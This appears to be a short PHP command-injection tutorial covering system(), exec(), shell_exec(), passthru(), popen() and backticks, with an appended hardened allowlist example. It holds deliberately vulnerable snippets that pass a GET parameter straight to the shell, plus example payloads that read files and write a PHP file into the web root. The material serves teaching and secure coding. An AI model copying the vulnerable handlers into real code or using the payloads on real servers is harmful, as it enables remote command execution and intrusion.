Functions that allow system command execution:
system()
exec()
shell_exec()
passthru()
popen()
Backticks
system()
<?php
if(isset($_GET['a'])){
system($_GET['a']);
}
else{
echo "Please input a";
}
?>
exec()
<?php
if(isset($_GET['a'])){
echo exec($_GET['a']);
}
else{
echo "Please input a";
}
?>
shell_exec()
<?php
if(isset($_GET['a'])){
echo shell_exec($_GET['a']);
}
else{
echo "Please input a";
}
?>
passthru()
<?php
if(isset($_GET['a'])){
passthru($_GET['a']);
}
else{
echo "Please input a";
}
?>
popen()
<?php
if(isset($_GET['a'])){
popen("whoami >> 1.txt",'r');
}else{
echo "Please input a";
}
?>
Backticks
<?php
if(isset($_GET['a'])){
echo `whoami`;
}else{
echo "Please input a";
}
?>
Exploiting the system command vulnerability
View a file
?a=type D:\phpStudy2018\PHPTutorial\WWW\1.txt
Show the current absolute path
?a=cd
Write a shell
?a=echo "<?php phpinfo();?>" > D:\phpStudy2018\PHPTutorial\WWW\phpinfo.php
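A hardened counterpart of the ?a= handlers above, as an added example that is not part of the original page: the request picks an action from an allowlist instead of supplying command text, and file viewing is done with PHP file functions rather than a shell. The action names, the f parameter, the temporary base directory and the helper names are assumptions made for illustration.

```php
<?php
// Added example, not from the original page. The action names, the "f"
// parameter and the helper names are assumptions made for illustration.
const ALLOWED_ACTIONS = ['whoami', 'viewlog'];

// Resolve a user-supplied file name inside $baseDir, or return null.
function safe_log_path(string $baseDir, $name): ?string
{
    // Plain file names only: no separators, drive letters or "..".
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false) {
        return null;
    }
    // After symlink resolution the file must still sit under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

function handle(array $query, string $baseDir): string
{
    $action = $query['a'] ?? '';
    // The request selects an action by name; it never supplies command text.
    if (!in_array($action, ALLOWED_ACTIONS, true)) {
        return 'Unknown action';
    }
    if ($action === 'whoami') {
        // Fixed command string, so nothing from the request reaches the shell.
        return htmlspecialchars(trim((string) shell_exec('whoami')), ENT_QUOTES);
    }
    // viewlog: read the file with PHP instead of shelling out to type/cat.
    $path = safe_log_path($baseDir, $query['f'] ?? null);
    if ($path === null) {
        return 'Invalid file';
    }
    return htmlspecialchars(trim((string) file_get_contents($path)), ENT_QUOTES);
}

// Constructed sample requests, run against a temporary directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cmd_demo_' . getmypid();
is_dir($dir) || mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'app.txt', "constructed log line\n");
foreach ([['a' => 'whoami'], ['a' => 'viewlog', 'f' => 'app.txt'],
          ['a' => 'viewlog', 'f' => '..\\..\\1.txt'], ['a' => 'cd']] as $q) {
    echo json_encode($q), ' => ', handle($q, $dir), PHP_EOL;
}
```

Where a request value genuinely has to become a command argument, wrapping it with escapeshellarg() keeps it a single argument; values beginning with a dash still have to be handled per command so they are not read as options.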